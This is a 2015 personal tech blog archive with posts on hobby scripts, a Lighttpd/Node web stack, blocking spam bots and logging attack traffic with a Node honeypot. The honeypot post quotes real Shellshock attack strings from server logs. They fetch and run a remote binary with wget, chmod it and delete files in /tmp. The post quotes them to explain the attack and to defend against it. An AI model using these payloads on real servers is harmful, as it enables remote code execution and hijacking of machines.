Thursday, December 31, 2015

Live Picture Frames: A Curious Perspective

Over the past week, I converted an old Kobo ereader into a live photo frame that displays a new photo from the Curiosity rover every day. The project turned out exceptionally well!

As always, source and instructions are on GitHub.

Case removed, picture frame being prepared.

Framed and hung!

Thursday, December 3, 2015

Archiving your Pocket list with Ruby

I've been seeking a more powerful and extensible alternative to Bash, and so I've recently begun experimenting with Ruby. For my first "real" test of the language, I decided to solve a problem I had been seeking an answer to for some time: Since the web is constantly changing, how could I go through my entire reading list and ensure that I had backup copies of the articles I've saved? As it turns out, there was a fairly simple solution to this- only 35 lines of Ruby!

The script itself uses the Curb and Nokogiri libraries to follow URL shorteners and parse HTML to ensure that the third main component, wkhtmltopdf (a personal favorite of mine), gets the most correct data for each link. To get your Pocket data into the script, you simply use Pocket's nifty HTML export tool to get a webpage full of links to all of your saved articles. 

Using the script is extraordinarily simple: Once dependencies are installed (see the top of the script for more information on that), you simply run ruby pocket_export.rb ~/Downloads/ril_export.html and you're off! The script creates the directory pocket_export_data to store the PDFs it generates and pocket_export_errors.log to keep track of any links it has trouble with. 


Tuesday, November 17, 2015

Language Speeds: A Quick and Dirty Test

Some time ago I decided to run a quick test to determine the performance of several popular programming languages by measuring the execution time of an algorithm to compute the greatest prime factor of a number.

The test itself was easy enough to set up and run, being no more than an implementation of a simple algorithm in several languages combined with a bash script to run them all in sequence. My findings, however, were interesting. 

I tested the following languages on several systems I had handy: 
  • C
  • Java
  • Python
  • Ruby
  • JavaScript
Unsurprisingly, C won out for speed; its execution times were the lowest across the board due to it being compiled directly to assembly.

In second place, surprisingly, came JavaScript. Looks like V8 really is all it's cracked up to be.

Following that, Python and Ruby were fairly close in speed, and Java was slowest across the board.

I encourage you to run your own tests and post the results! The source code (along with my initial test) is on GitHub.

Saturday, August 29, 2015

IPv6 Support is Here!

Following a change in my hosting configuration, I've decided to enable IPv6! You can now connect to any of the sites hosted by CTIS with the marvelous new IPv6 protocol, provided that your ISP or tunnel provider peers with DigitalOcean. 

And on a semi-related note, general load times should be much quicker, and the site will be much more stable, since I'm no longer hosting the site from my closet on a 30/4 connection.


Thursday, July 23, 2015

Get notified when your linux server boots.

Getting notified of things is great, and when one of your servers boots up, it's always good to know when. With that in mind, it's easy to add this feature to most any Linux or BSD server without much trouble, especially since I've already done the work for you :)

Here's an example message, from one of my servers:
Box has booted! 
System information: 
Date and time: 
Thu Jul  9 20:43:49 EDT 2015 
Uptime (length of boot): 
20:43:49 up 1 min,  0 users,  load average: 2.94, 0.98, 0.35 
Network addresses:  
Server disk usage: 
Filesystem                  Size  Used Avail Use%   
Mounted on/dev/mapper/Box--vg-root  1.8T  1.5T  266G  85% /

By pasting my Boot Notification Script into your /etc/rc.local, you can use your local mail server to send boot notifications with useful statistics whenever your system comes up, with minimal and straightforward configuration.

Note that this script requires a functioning mail server to be running on the system (such as Postfix), as well as the mailx utility, which can be installed from the mailutils or bsd-mailx packages. In a future post, I'll explain how you can easily send mail via postfix using Gmail as a relay, while also keeping your domain name intact.

For inital setup, which will produce the message shown above, you only have to set 2 variables, EMAIL and LANIFACE. There is a third variable, HOST, which is automatically set using the machine's hostname.

EMAIL should contain the email address to which messages should be sent. If you like, you can add multiple addresses, separated by commas. This can be any email address, including your phone's if you'd like to get notifications via SMS.

The second is HOST. This is set automatically from the machines hostname and requires no manual configuration.

The third is LANIFACE, which is the network interface that the LAN IP should be retrieved from. Usually, this is eth0, but it changes depending on your OS. You can run the command ip link show to get a list of your available network interfaces, if you're unsure.


On some systems, /sbin/ifconfig is not installed. This command is usually replaced with /sbin/ip, with addresses shown using the command "ip addr". 
Should this be the case, replace the code on line 52 with the following:
`/bin/ip addr | /bin/grep inet | /usr/bin/tail -n 2 | /usr/bin/head -n 1` 
Which should produce something along the lines of:
inet brd scope global eth0

Monday, July 6, 2015

Banepost.c: Easy Baneposting for the Linux Enthusiast

Have you ever been browsing your favorite online forum or social media website, when suddenly, you see the perfect opportunity to make a reference to your absolute favorite meme? 

Have you ever proceeded to throw your hands up in anguish when you suddenly realized that, nowhere in your extensive collection of images, copypasta, and everything in between, could you find that one, perfect ASCII banepost that would have made the perfect reply? 

Well then I've got the perfect software for you. 
I've tried countless other programs, but none of them flied so well, and some of them even crashed my computer, with no survivors! 

Ultimately, I became so distraught by the lack of free, open source software to solve this problem that I decided to create my own implementation of everyone's favorite Big Guy, Banepost.c, which I guarantee is better than any competing version (at least it can talk). 

It didn't matter who I was, what mattered was my plan, and that was to start a fire in the open source copypasta community that would not only tell you about Bane, but also why he wore the mask. If this were some grand crime, then getting caught is most certainly a part of my plan, and I wasn't alone in this effort. 

There are many eager young developers in the OSS with a fire in their hearts which rises as they find themselves Completely In Agreement with this effort, and that will undoubtedly lead them to create their own, high quality copypasta generating software.


Sunday, June 28, 2015

The Episorter: Taking the Monotony out of Renaming TV Episodes

I recently had to rename around 200 TV episodes on my Plex server, a daunting task that would normally involve several terribly boring hours and hundreds of mvs. That is, if I hadn't taken advantage of the power of Bash to solve my problem!

Some background

Plex is an absolutely amazing media server, and, when presented with a directory full of media files, it's generally able to match and categorize them accurately and without human intervention. However, it can be picky, especially when it comes to TV episodes. In my case, I had a couple hundred episodes of The Office that followed a naming convention that Plex didn't like, meaning that I got all the way to season 3 without realizing that I was missing nearly 10 episodes per season!

My episodes were named like so:

.../plex/TV/The Office/Season 2/Episode 3 - Office Olympics.mp4 

However, this is Plex's preferred naming scheme:

.../plex/TV/The Office/Season 2/S02E3 - Office Olympics.mp4

As a result, I whipped up a small script to save me from a future of bloodshot eyes and cramped hands, which was able to tear through the job in less than 2 minutes in total:

I call it the episorter, and it takes all the variables that it requires from the directory name (i.e. 'Season 2') and the number of episodes in the current directory, and then renames each of the episodes to align with Plex's preferred scheme.

I hope it helps somebody!

Tuesday, June 2, 2015

The LLMN Stack: A Comparison

Artist's representation of the LLMN stack.

I figured I should make a short post about my web stack.

A bit of background

I prefer lightweight and fast pieces of software that sip system resources, so it's no secret that I dearly love web servers like Lighttpd and NodeJS. Coming from a background where old, slow, and obsolete hardware was all that I had available to play around with put system optimization at the forefront of my priorities.

My very first "server" of sorts was an original raspberry pi model B. I kept it in a cabinet in my room, and it was connected to my network via wi-fi. Reception was terrible, and so the website I ran on it (which was hosted by Apache) was sluggish but still just good enough that I was able to serve a 144p shockwave flash video of my principal dancing hilariously to some music, which was super funny among my peers.

Eventually, I switched from Apache to Lighttpd, because I was also trying to use the pi as a media center with XBMC and a Samba server, and I needed a lighter weight web server (and besides, for completely static sites Apache is overkill).

In my searching, I came across Lighttpd (I don't know why I didn't find Nginx first, but I wish I had, especially since Lighty v1.5 is slow in coming) and it solved all of my problems. I would later switch back to Apache when I got a slightly nicer desktop from a computer recycling plant, but I eventually returned, once again, to Lighttpd.

About the stack

So, with speed, a small footprint, and performance in mind, LLMN is extremely close to LEMP. In fact, in benchmarks, Lighttpd and Nginx are remarkably close (though Nginx is often slightly faster).

Here are a few good benchmarks comparing them:
As noted earlier, the performance of the two servers is strikingly similar. That said, for my needs (running a small site that averages around 1k requests per day), Lighttpd is perfect. It's been rock solid, low-maintenance, and has gracefully scaled up to my needs as they have grown, and hasn't crashed once over years and years of use. I will admit, however, that I've been considering switching to Nginx recently, though I dread porting my configuration files. Incidentally, that would make this a LEMN stack :P

In fact, I was DDOSed several months ago, and my uplink bandwidth was saturated long before Lighttpd even began to use more than 2% CPU usage.

Besides the web servers, the other major difference between these two stacks is the choice of server-side language (which, in the case of LLMN, is JavaScript instead of PHP).

There are a few good reasons for this:

I love JavaScript. It's the language of the web and has absolutely soared in popularity over the past few years. It runs everywhere, from desktops and mobile devices to servers and even microcontrollers! The ability to develop and maintain applications in a single language across both the client and server is also very alluring, and simplifies the development process considerably.

NodeJS, like Lighttpd, is fast, lightweight, and asynchronous.  Have a look at this benchmark. Or this test.

NodeJS has lots of modules, packages, and libraries available to freely use (though this is also true of PHP). There are over 153,000 packages available on npm, which is Node's package manager.

NodeJS has an enormous community. Because JavaScript runs everywhere, Node developers can get help from the entire JavaScript community, while working on a project. This portability means that help and support is extremely easy to come by. As a result, Node is great for newcomers to server-side web development.

Also, these fortune 500 companies all use Node for their backend.


The Pros

  • LLMN is fast, low-maintenance, and extremely resilient, with an incredibly small footprint.
  • NodeJS is fast, has a great community, and extensible with lots and lots of modules and libraries. JS as a common language on both the client and server makes web development much easier. 

The Cons

  • NodeJS still isn't as widely used as PHP, which powers popular frameworks like Wordpress.
  • While Lighttpd is fantastic for static pages or as a proxy, Apache, though heavier, is generally better at interfacing with PHP and serving dynamic content. Lighttpd is also outperformed by Nginx by a hair. Compared to Nginx, Lighttpd lacks some features. 

Sunday, May 24, 2015

Stopping Google Analytics Spammers

Any observant user of Google Analytics will have undoubtedly noticed a large amount of traffic coming from curious looking referrers, like so:

This is worrying! Not only does it completely destroy any chance of getting actual, valid traffic data from Analytics, but it also frustratingly puts your website's data at the hands of internet spammers. Ouch!

So here's a quick tip for stopping the (unfortunately) prevalent Google Analytics spammers from your site.

First, delete and re-add your website to Analytics to get a new property ID, and retrieve your new tracking code.

Next, obfuscate your JS tracking code to keep bots from finding your site's analytics property ID.  I've been using this method for several months now and can confirm that it has no effect on the functionality of analytics and doesn't break anything.

Monday, May 11, 2015

Blocking Bad Bots in 3 Easy Steps with Lighttpd.

I figured that a good follow up to my last post would be a new one about good bot stopping practices.

In this tutorial, we'll be looking at best practices for Lighttpd, but configuration options for these tips are available in all major web servers (Apache, Nginx, IIS, etc).

The internet is a scary place, and anyone whose even taken a cursory glance at their web server access logs will certainly have noticed the amount of clearly malicious or spammy requests made to their web server. Internet scrapers and spam referrers are just some of the nasty things you're sure to see strewn about your access logs.

These bots are typically searching for exploits (which is an automated, brute-forced process), though many others are looking for personal information such as email addresses and phone numbers to send spam to. There may also be search engines who crawl your site too frequently, making large amounts of requests at close intervals (eating bandwidth and system resources).

There are a few ways to keep this behavior under control, at least for the good robots. Any good webmaster will have undoubtedly created a good, strong robots.txt to keep out unwanted crawlers, but a shockingly large amount of them disregard it entirely.

A good example of this is Baidu, who, after being blocked in both my robots.txt and my web server configuration, actually went so far as to change the user agent of their web spiders to circumvent the blocks!

Because such nasty programs exist, we have to "break out the big guns" and block them in our web server config, and thankfully, Lighttpd provides plenty of options for us to do just that :)

Step one.

Grab the latest copy of my anti-spam configuration and copy it to your clipboard.

Step two.

On your server, cd to /etc/lighttpd and touch the file spam.conf. Open that file in your favorite text editor and paste in the contents of the anti-spam config. (note: you may need to su to root or use sudo to create and edit these files)

Open your lighttpd configuration file (usually /etc/lighttpd/lighttpd.conf) and add the line:

    include spam.conf

Step three.

Reload your web server's configuration, and restart it:

    /etc/init.d/lighttpd reload
  /etc/init.d/lighttpd restart

And just like that, a large portion of the most common offenders is blocked from your site!

Of course, this tutorial wouldn't be complete without a section on how to add your own custom rules, so I'll explain that, too!

Let's look at the three different conditional statements that you would be using to block bots and referrers from accessing your site. They are more or less self-explanatory, so here they are:
  1.     $HTTP["referer"]
  2. $HTTP["useragent"]
  3. $HTTP["remoteip"]
These conditionals, when used in conjunction with one of lighttpd's conditional operators and regular expressions give you powerful, granular control over who (or what) can access your site.

Wednesday, April 29, 2015

Full site HTTPS is here!


Now you can browse all of these silly pages securely, without fear of certain government agencies discovering your appreciation for Nicolas Cage!

Check out my SSL test ratings (All A+s!):

Wednesday, April 22, 2015

Catching Spam Bots In the Act with Node

Have you ever been searching through your webserver's logs and noticed Chinese IP's making nasty looking requests like


    GET /cgi-bin/bash HTTP/1.1
    GET /cgi-bin/php HTTP/1.1
    GET /rom-0 HTTP/1.1


    () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -O /tmp/;curl -O /tmp/;perl /tmp/;rm -rf /tmp/*\");'"

Or even _this_?

    () { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://123.456.7.8:911/java -O /tmp/China.Z-rmeo >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-rmeo >> /tmp/;echo /tmp/China.Z-rmeo >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"

Though most current web servers are immune to these simple attacks (assuming, of course, that you've been keeping your packages updated), it's often interesting to see how bots attempt to exploit vulnerable services running on web servers. 
In some cases, such as the log excerpts above, it's easy to see how this is achieved. The user-agent is crafted to exploit CVE-2014-6271 (AKA Shellshock), which results in some commands being run that turn our precious server into a mindless zombie :(
However, in other cases, this information is not as apparent. The default logging configuration for most web servers doesn't include other data which could potentially be used as an attack vector, such as HTTP headers!
Therefore, we'll have to write our own script to collect this data from such nasty requests and log it. 
You'll need to either create a script that listens to HTTP requests and writes all those juicy details to a log file in whatever language you like (Python, PHP, Ruby, even a Perl CGI script), or find one out on the net somewhere. I'm just going to reuse one of my old projects for this, which just so happens to be written in Node. Here's the adapted version.

If you do decide to write your own script, make sure that it does the following:
  1. Accepts all incoming HTTP connections.
  2. Logs the details of those connections to a file. 
  3. Returns 200 as the response code (You attract more bots with honey than with vinegar, so make the request appear to work).
  4. Is watertight and ready to face the incoming nastiness (wouldn't want to inadvertently become a part of the botnet :P)
You may also want to find out some URLs that these bots seem to check regularly, because we'll need those later for our web server configuration, but I will have some examples in this post. 
I'm going to set this up on my auxiliary server, which also sits in a "residential" IP space and gets a fair amount of these bots as result. 
On to the configuration.
In your web server's configuration, set up a reverse proxy to whatever port your script is listening for requests on.

Here's one of mine (I run Lighttpd):
$HTTP["url"] == "/cgi-bin/test.cgi" {
proxy.server = ( "" => ( (
        "host" => "",
        "port" => 8082 ) ) )
Pretty straightforward. We take all requests for /cgi-bin/test.cgi and proxy them to our script, which in this case is running on port 8082 on the local machine. 
Apply the configuration and use your favorite command line utility to make a request to your shiny new reverse proxy.
Here's an example output from mine:
    "fi_timeStamp": "2015:04:22:06:01:55",
    "fi_requestIP": "",
    "fi_method": "GET",
    "req_headers": {
        "accept": "text/html, application/xhtml+xml, */*",
        "user-agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)",
        "host": "123.456.7.8:80",
        "authorization": "Basic Og==",
        "x-forwarded-for": "432.10.54.21",
        "x-host": "123.456.7.8:80",
        "x-forwarded-proto": "http"
Once everything is working, just sit back, relax, and keep an eye on your logs :)
UPDATE: I'll be working to keep an active list of spammer IPs available. I'll post another update when it's up.

Sunday, March 22, 2015

Unexpected SEO, or How Became #3 in Pictures of Marijuana.

So I just noticed in my webserver's logs that I was getting a lot of these requests: - [22/Mar/2015:18:25:37 -0400] "GET /resources/420/images/dank_ass_bg.jpeg HTTP/1.1" 200 395479 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"

Thousands of them, in fact. 8,141 in the past 7 days! 

Naturally, this piqued my interest, so after further inspection, I noticed that the majority of these requests had Google as a referrer, generally something along the lines of 

And that's how I realized that the background image of my snoop dogg page was the third result for "weed" on google images, and the first actual picture of marijuana for that query. 

I feel successful.